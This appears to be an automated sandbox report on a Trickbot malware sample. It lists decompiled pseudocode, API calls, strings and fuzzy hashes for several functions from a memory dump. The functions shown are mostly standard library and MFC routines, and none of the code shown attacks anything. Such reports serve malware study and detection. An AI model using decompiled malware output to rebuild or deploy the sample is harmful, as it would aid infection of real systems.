GetClassInfoA.USER32(?,-00000058,?), ref: 004194D3

Strings

Afx:%x:%x, xrefs: 004194A2

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
String ID: Afx:%x:%x
API String ID: 2529146597-2071556601
Opcode ID: cbccef900036fa227f4702b24e974e0869e4a31dd4400d24074d147dc7009176
Instruction ID: 0d9d3c4c15e9cd7e8cd16735e69a16ae042555e899a34f3f0b1d9621fb0b9e59
Opcode Fuzzy Hash: cbccef900036fa227f4702b24e974e0869e4a31dd4400d24074d147dc7009176
Instruction Fuzzy Hash: 55112171A00209AF8F10EFA6D9819DF7BB8EF58754F00402BE905E2201D7789E41CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECD5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040ECD5() {
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t28;
				void* _t30;

				 *((intOrPtr*)( *((intOrPtr*)( *0x44bcd8 + 4)) + 0x44bcd4)) = 0x43ec40;
				 *0x44bcd8 = 0x43ec48;
				E00405340(E00438E23, _t30);
				_push(0x44bcd8);
				_t28 = 0x44bcdc;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x44bcdc;
				 *((intOrPtr*)(0x44bcdc)) = 0x43ed34;
				_t18 =  *0x0044BD00;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				if(_t18 <= 0) {
					L5:
					E0040FD0F(_t28);
				} else {
					 *((char*)(_t18 + 0x44bf14)) =  *((char*)(_t18 + 0x44bf14)) - 1;
					if( *((char*)( *((intOrPtr*)(0x44bd00)) + 0x44bf14)) <= 0) {
						goto L5;
					}
				}
				_t20 = E0040DFC2(_t28 + 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t20;
			}

0x0040eca3
0x0040efe5
0x0040fc00
0x0040fc05
0x0040fc07
0x0040fc09
0x0040fc0c
0x0040fc12
0x0040fc15
0x0040fc1b
0x0040fc2f
0x0040fc31
0x0040fc1d
0x0040fc1d
0x0040fc2d
0x00000000
0x00000000
0x0040fc2d
0x0040fc39
0x0040fc42
0x0040fc4a

APIs

__EH_prolog.LIBCMT ref: 0040FC00

Strings

LC, xrefs: 0040ECD5
@C, xrefs: 0040ECA3

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog
String ID: @C$LC
API String ID: 3519838083-3536014141
Opcode ID: 030e052b1ab28efde695e42aa561c7ad37c9b07f75ec40106a909869b751091b
Instruction ID: d8b5cb53c324347aa0ee5628501bb8d79d73d7d37aa443073f3dc6a254affe88
Opcode Fuzzy Hash: 030e052b1ab28efde695e42aa561c7ad37c9b07f75ec40106a909869b751091b
Instruction Fuzzy Hash: 70F0A9706046408BE324DF19C545A69BBE0FB08308F1488BFE443AB781D7B8A909CF4E

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED04, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040ED04() {
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t28;
				void* _t30;

				 *((intOrPtr*)( *((intOrPtr*)( *0x44bd18 + 4)) + 0x44bd14)) = 0x43ec40;
				 *0x44bd18 = 0x43ec48;
				E00405340(E00438E23, _t30);
				_push(0x44bd18);
				_t28 = 0x44bd1c;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x44bd1c;
				 *((intOrPtr*)(0x44bd1c)) = 0x43ed34;
				_t18 =  *0x0044BD40;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				if(_t18 <= 0) {
					L5:
					E0040FD0F(_t28);
				} else {
					 *((char*)(_t18 + 0x44bf14)) =  *((char*)(_t18 + 0x44bf14)) - 1;
					if( *((char*)( *((intOrPtr*)(0x44bd40)) + 0x44bf14)) <= 0) {
						goto L5;
					}
				}
				_t20 = E0040DFC2(_t28 + 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t20;
			}

APIs

__EH_prolog.LIBCMT ref: 0040FC00

Strings

LC, xrefs: 0040ED04
@C, xrefs: 0040ECA3

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog
String ID: @C$LC
API String ID: 3519838083-3536014141
Opcode ID: 2c20c0550ff517b536965ffc2f7513579a371389062e96a8409c6c0f06e4bf14
Instruction ID: 4bf6fb591218577045a7376577987f05f18d2fd96a210d26914e3d5483a51808
Opcode Fuzzy Hash: 2c20c0550ff517b536965ffc2f7513579a371389062e96a8409c6c0f06e4bf14
Instruction Fuzzy Hash: A5F0AD706046408BE324DF19C505A697BE0FB08304F1488BFE443AB781D778A905CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EED2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040EED2(intOrPtr* __ecx) {
				intOrPtr* _t28;
				void* _t30;

				E00405340(E00438CF6, _t30);
				_push(__ecx);
				_push(__ecx);
				_t28 = __ecx;
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0;
				if( *((intOrPtr*)(_t30 + 0x14)) != 0) {
					 *__ecx = 0x43ec4c;
					 *((intOrPtr*)(__ecx + 0x28)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0x43ec48;
					 *((intOrPtr*)(_t30 - 0x10)) = 1;
					 *((intOrPtr*)(_t30 - 4)) = 0;
				}
				 *((intOrPtr*)( *((intOrPtr*)( *_t28 + 4)) + _t28)) = 0x43ec40;
				if( *((intOrPtr*)(_t30 + 0x10)) != 0) {
					E0040F745( *((intOrPtr*)( *_t28 + 4)) + _t28, _t30,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t28;
			}

0x0040eed7
0x0040eedc
0x0040eedd
0x0040eee4
0x0040eee6
0x0040eee9
0x0040eeec
0x0040eeee
0x0040eef4
0x0040eef7
0x0040eefe
0x0040ef05
0x0040ef05
0x0040ef10
0x0040ef17
0x0040ef26
0x0040ef26
0x0040ef31
0x0040ef39

APIs

__EH_prolog.LIBCMT ref: 0040EED7

Strings

LC, xrefs: 0040EEDE
HC, xrefs: 0040EEF7

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog
String ID: HC$LC
API String ID: 3519838083-3777758554
Opcode ID: 9736e670d445d14e1ac8866678feab1403ae9e206676d071f5dd1ca3b5d7eb89
Instruction ID: 2c3081881f85edbeaa1b345c483475d37f09ac393e85901a2881550ebc865d15
Opcode Fuzzy Hash: 9736e670d445d14e1ac8866678feab1403ae9e206676d071f5dd1ca3b5d7eb89
Instruction Fuzzy Hash: CD011D719016159FD719CF55C404A9EBBF0FF08304F14992FE846AB381D7B5A950CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004042A5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004042A5(char _a4, signed int _a8) {
				intOrPtr* _t18;

				if(E004041CD() == 0) {
					if((_a8 & 0x00000003) != 0) {
						L8:
						return 0x12340042;
					}
					_t6 =  &_a4; // 0x40435e
					_t18 =  *_t6;
					if( *((intOrPtr*)(_t18 + 8)) <= 0 ||  *((intOrPtr*)(_t18 + 0xc)) <= 0 ||  *_t18 >= GetSystemMetrics(0) ||  *((intOrPtr*)(_t18 + 4)) >= GetSystemMetrics(1)) {
						return 0;
					} else {
						goto L8;
					}
				}
				return  *0x44b0c8(_a4, _a8);
			}

0x004042ae
0x004042c5
0x004042f1
0x00000000
0x004042f1
0x004042c7
0x004042c7
0x004042d0
0x00000000
0x00000000
0x00000000
0x00000000
0x004042d0
0x00000000

APIs

GetSystemMetrics.USER32(00000000), ref: 004042DE
GetSystemMetrics.USER32(00000001), ref: 004042E6

Strings

^C@, xrefs: 004042C7

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsSystem
String ID: ^C@
API String ID: 4116985748-887851006
Opcode ID: 7d63253bacac1d02d03c4edf3a55ec31adf953980967ea9a6e4b7f742f838365
Instruction ID: 2955014addd01754330358916620dbef1c81e24187c4ea93dcfe4272a6edf640
Opcode Fuzzy Hash: 7d63253bacac1d02d03c4edf3a55ec31adf953980967ea9a6e4b7f742f838365
Instruction Fuzzy Hash: CAF09075214342CBC7219B768C00527B7E0ABD43D8F404C7EF695A2590D338D882EB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFF0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040EFF0(intOrPtr* __ecx) {
				intOrPtr* _t28;
				void* _t30;

				E00405340(E00438D3E, _t30);
				_push(__ecx);
				_push(__ecx);
				_t28 = __ecx;
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0;
				if( *((intOrPtr*)(_t30 + 0x10)) != 0) {
					 *__ecx = 0x43ec54;
					 *((intOrPtr*)(__ecx + 0x2c)) = 0;
					 *((intOrPtr*)(__ecx + 8)) = 0x43ec48;
					 *((intOrPtr*)(_t30 - 0x10)) = 1;
					 *((intOrPtr*)(_t30 - 4)) = 0;
				}
				 *((intOrPtr*)(_t28 + 4)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *_t28 + 4)) + _t28)) = 0x43ec38;
				E0040F745( *((intOrPtr*)( *_t28 + 4)) + _t28, _t30,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)));
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t28;
			}

0x0040eff5
0x0040effa
0x0040effb
0x0040f002
0x0040f004
0x0040f007
0x0040f00a
0x0040f00c
0x0040f012
0x0040f015
0x0040f01c
0x0040f023
0x0040f023
0x0040f026
0x0040f034
0x0040f042
0x0040f04d
0x0040f055

APIs

__EH_prolog.LIBCMT ref: 0040EFF5

Strings

HC, xrefs: 0040F015
TC, xrefs: 0040EFFC

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog
String ID: HC$TC
API String ID: 3519838083-4078565266
Opcode ID: 76b7413acd93e13ed59c9a5696f673bf48dfb41152db73430a47ed3f66f13e24
Instruction ID: 3ae02a703609bbdba7311556ac52154405d795a2a08133e5722b716cd1217bbc
Opcode Fuzzy Hash: 76b7413acd93e13ed59c9a5696f673bf48dfb41152db73430a47ed3f66f13e24
Instruction Fuzzy Hash: EA01F6B1A006159FCB24CF59C404A9EBBF0FB08304B10992EE459A7781D7B8A900CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004100D8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E004100D8(void* __eflags) {
				intOrPtr* _t42;
				intOrPtr* _t52;
				void* _t54;
				signed int _t60;

				E00405340(E00438EA4, _t54);
				 *((char*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 - 0xd));
				E0040E765(_t54 - 0x20, 0);
				E0040E9CB(_t54 - 0x20, _t54, "string too long", E00409BE0("string too long"));
				_t5 = _t54 - 4;
				 *_t5 =  *(_t54 - 4) & 0x00000000;
				_t60 =  *_t5;
				_push(_t54 - 0x20);
				_t42 = _t54 - 0x3c;
				L1();
				 *((intOrPtr*)(_t54 - 0x3c)) = 0x43ed58;
				E00405861(_t54 - 0x3c, 0x444198);
				_pop(_t51);
				E00405340(E00438EB8, _t54);
				_push(_t42);
				_push(_t42);
				_t52 = _t42;
				 *((intOrPtr*)(_t54 - 0x14)) = _t52;
				 *((intOrPtr*)(_t54 - 0x10)) = 0x449350;
				E004144DA(_t42, _t60, _t54 - 0x10);
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				 *((char*)(_t52 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8))));
				E0040E765(_t52 + 0xc, 0);
				E0040FD59(_t52 + 0xc,  *((intOrPtr*)(_t54 + 8)), 0,  *0x43ec30);
				 *_t52 = 0x43ed78;
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t52;
			}

0x004100dd
0x004100ee
0x004100f1
0x00410107
0x0041010c
0x0041010c
0x0041010c
0x00410113
0x00410114
0x00410117
0x00410125
0x0041012c
0x00410131
0x00410137
0x0041013c
0x0041013d
0x00410144
0x00410147
0x0041014a
0x00410151
0x00410159
0x00410166
0x00410168
0x00410178
0x00410180
0x0041018b
0x00410193

APIs

__EH_prolog.LIBCMT ref: 004100DD

Part of subcall function 00410132: __EH_prolog.LIBCMT ref: 00410137

Part of subcall function 00405861: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00405287,00000000), ref: 0040588F

Strings

XC, xrefs: 00410125
string too long, xrefs: 004100F6, 004100FB, 00410103

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog$ExceptionRaise
String ID: XC$string too long
API String ID: 2062786585-2317762258
Opcode ID: fe9368cbbbf84fa041624c24df6f425f7c455d15ae19cf93271a8edbd1b53c0b
Instruction ID: 4b9643e82e25b7094b8b0c40d244b5d6f0ee490785af3aecc81733f7c77c5746
Opcode Fuzzy Hash: fe9368cbbbf84fa041624c24df6f425f7c455d15ae19cf93271a8edbd1b53c0b
Instruction Fuzzy Hash: ADF0FE66C11258AADB04F7E6D846ADEB77CAF18318F40446AF411B6092DF7C5A04CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00412040, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00412040(struct HWND__* _a20) {
				struct HWND__* _t3;
				int _t5;
				void* _t9;
				CHAR* _t10;

				_t10 = _t9 - 0x10;
				if( *0x44d360 < 0x35f) {
					L3:
					return 1;
				} else {
					_t3 = _a20;
					if(_t3 == 0) {
						goto L3;
					} else {
						GetClassNameA(_t3, _t10, 0x10);
						_t5 = lstrcmpA(_t10, "ComboBox");
						asm("sbb eax, eax");
						return _t5 + 1;
					}
				}
			}

0x00412040
0x0041204c
0x0041207e
0x00412086
0x0041204e
0x0041204e
0x00412054
0x00000000
0x00412056
0x0041205e
0x0041206e
0x00412077
0x0041207d
0x0041207d
0x00412054

APIs

GetClassNameA.USER32(?,?,00000010), ref: 0041205E
lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 0041206E

Strings

ComboBox, xrefs: 00412068

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ClassNamelstrcmp
String ID: ComboBox
API String ID: 3770760073-1152790111
Opcode ID: 2ac1e9ac59f64678fe8f307443fac26cfc83c2e0c3e33e3da96cb4e46f1c3244
Instruction ID: 70eada050e16ef3b60972735b7ba3c3ddda0e91231b9546bd1956712589a64a0
Opcode Fuzzy Hash: 2ac1e9ac59f64678fe8f307443fac26cfc83c2e0c3e33e3da96cb4e46f1c3244
Instruction Fuzzy Hash: B9E0DF706002016BD714AB68CD0ABAA32A4F708701F880E5CF559C21A1F7FAD9A4C20A

Uniqueness

Uniqueness Score: -1.00%

Function 00431EFF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00431EFF(void* __ecx) {
				short _t5;
				void* _t8;

				_t8 = __ecx;
				 *((short*)(_t8 + 0xb0)) = GlobalAddAtomA( *(__ecx + 0x88));
				_t5 = GlobalAddAtomA("system");
				 *(_t8 + 0xb2) = _t5;
				return _t5;
			}

0x00431f00
0x00431f16
0x00431f1d
0x00431f1f
0x00431f28

APIs

GlobalAddAtomA.KERNEL32(?), ref: 00431F0F
GlobalAddAtomA.KERNEL32(system), ref: 00431F1D

Strings

system, xrefs: 00431F11

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AtomGlobal
String ID: system
API String ID: 2189174293-3377271179
Opcode ID: 3cec64a00b4a55b79221fc4e6b7606f82d32add807d0cb78f2aa499863a6c7e2
Instruction ID: 0809506807bf572a4bc7ee841f343839afbb796f28b25228447e89507f9524cd
Opcode Fuzzy Hash: 3cec64a00b4a55b79221fc4e6b7606f82d32add807d0cb78f2aa499863a6c7e2
Instruction Fuzzy Hash: F6D0C92651879056CA2067B9AC01B87B2A9BFC5210F16152FE455831209BA028458759

Uniqueness

Uniqueness Score: -1.00%

Function 00432C5C, Relevance: 5.1, APIs: 4, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00432C5C(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t29;
				intOrPtr _t32;
				long* _t37;
				intOrPtr* _t42;
				signed int _t45;
				struct _CRITICAL_SECTION* _t46;
				intOrPtr* _t49;

				_push(__ecx);
				_t49 = _a4;
				_t37 = __ecx;
				_t45 = 1;
				_v8 = _t45;
				if( *((intOrPtr*)(_t49 + 8)) <= _t45) {
					L10:
					_t46 =  &(_t37[7]);
					EnterCriticalSection(_t46);
					E004328D6( &(_t37[5]), _t49);
					LeaveCriticalSection(_t46);
					LocalFree( *(_t49 + 0xc));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49))(1);
					}
					_t29 = TlsSetValue( *_t37, 0);
					L13:
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t37[4] + 4 + _t45 * 8)) == _t32) {
						_t42 =  *((intOrPtr*)( *(_t49 + 0xc) + _t45 * 4));
						if(_t42 != 0) {
							 *((intOrPtr*)( *_t42))(1);
						}
						_t29 =  *(_t49 + 0xc);
						 *(_t29 + _t45 * 4) =  *(_t29 + _t45 * 4) & 0x00000000;
					} else {
						_t29 =  *(_t49 + 0xc);
						if( *(_t29 + _t45 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t45 = _t45 + 1;
				} while (_t45 <  *((intOrPtr*)(_t49 + 8)));
				if(_v8 == 0) {
					goto L13;
				}
				goto L10;
			}

0x00432c5f
0x00432c62
0x00432c68
0x00432c6a
0x00432c6e
0x00432c71
0x00432cb5
0x00432cb5
0x00432cb9
0x00432cc3
0x00432cc9
0x00432cd2
0x00432cda
0x00432ce2
0x00432ce2
0x00432ce8
0x00432cee
0x00432cf2
0x00000000
0x00000000
0x00000000
0x00432c73
0x00432c73
0x00432c73
0x00432c78
0x00432c95
0x00432c9a
0x00432ca0
0x00432ca0
0x00432ca2
0x00432ca5
0x00432c83
0x00432c83
0x00432c8a
0x00432c8c
0x00432c8c
0x00432c8a
0x00432ca9
0x00432caa
0x00432cb3
0x00000000
0x00000000
0x00000000

APIs

EnterCriticalSection.KERNEL32(?), ref: 00432CB9
LeaveCriticalSection.KERNEL32(?,?), ref: 00432CC9
LocalFree.KERNEL32(?), ref: 00432CD2
TlsSetValue.KERNEL32(?,00000000), ref: 00432CE8

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 48fa9aff4c102404775643a88f085fe6451166b81dd0cac608f26f65c7ddd2d1
Instruction ID: 84ff981ff66eb6d4a1579b6f867207a0ff1eadc0cc29494d6b05f6d2c53819b7
Opcode Fuzzy Hash: 48fa9aff4c102404775643a88f085fe6451166b81dd0cac608f26f65c7ddd2d1
Instruction Fuzzy Hash: CA219A31200610EFDB248F48C985BAE77A4FF89711F00A46AE5428B2A1C7B5EC40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004330FA, Relevance: 5.0, APIs: 4, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004330FA(signed int _a4) {
				void* _t14;
				struct _CRITICAL_SECTION* _t16;
				signed int _t22;
				intOrPtr* _t25;
				intOrPtr _t30;
				intOrPtr _t31;

				_t30 =  *0x44b70c; // 0x1
				if(_t30 == 0) {
					_t14 = E00433067();
				}
				_t31 =  *0x44b708; // 0x0
				if(_t31 == 0) {
					_t22 = _a4;
					_t25 = 0x44b510 + _t22 * 4;
					if( *((intOrPtr*)(0x44b510 + _t22 * 4)) == 0) {
						EnterCriticalSection(0x44b558);
						if( *_t25 == 0) {
							InitializeCriticalSection(0x44b570 + (_t22 + _t22 * 2) * 8);
							 *_t25 =  *_t25 + 1;
						}
						LeaveCriticalSection(0x44b558);
					}
					_t16 = 0x44b570 + (_t22 + _t22 * 2) * 8;
					EnterCriticalSection(_t16);
					return _t16;
				}
				return _t14;
			}

0x004330fd
0x00433103
0x00433105
0x00433105
0x0043310a
0x00433110
0x00433114
0x00433125
0x0043312c
0x00433135
0x0043313a
0x00433147
0x0043314d
0x0043314d
0x00433150
0x00433156
0x0043315a
0x00433162
0x00000000
0x00433165
0x00433167

APIs

EnterCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433135
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433147
LeaveCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433150
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011), ref: 00433162

Part of subcall function 00433067: GetVersion.KERNEL32(?,0043310A,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011,0041E91C), ref: 0043307A

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 8c124c4be3fc2627b3d783a3bc0f87ba09e74264a379837e466de0b4ca150539
Instruction ID: 86c187ca0cd3bf356466e188d9bee37f80f1190fadc38078eab707e7796e6df8
Opcode Fuzzy Hash: 8c124c4be3fc2627b3d783a3bc0f87ba09e74264a379837e466de0b4ca150539
Instruction Fuzzy Hash: F6F03C3940021AEFDB109FA8EC84957B7A8EB5531BF00683BE60592121E738E954CAEC

Uniqueness

Uniqueness Score: -1.00%

Function 00408019, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408019(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x448270);
				InitializeCriticalSection( *0x448260);
				InitializeCriticalSection( *0x448250);
				InitializeCriticalSection( *0x448230);
				return _t1;
			}

0x00408019
0x00408026
0x0040802e
0x00408036
0x0040803e
0x00408041

APIs

InitializeCriticalSection.KERNEL32(?,00407AB2,?,00405217), ref: 00408026
InitializeCriticalSection.KERNEL32(?,00407AB2,?,00405217), ref: 0040802E
InitializeCriticalSection.KERNEL32(?,00407AB2,?,00405217), ref: 00408036
InitializeCriticalSection.KERNEL32(?,00407AB2,?,00405217), ref: 0040803E

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: bce2d2705054481c8eb65c820dec133da36924bce70079a761cef1ed0e5549a4
Instruction ID: dd913382ee95876d4a01ff10f75b0ef6866237a19ef1d154ca1fd69e9cc92bfd
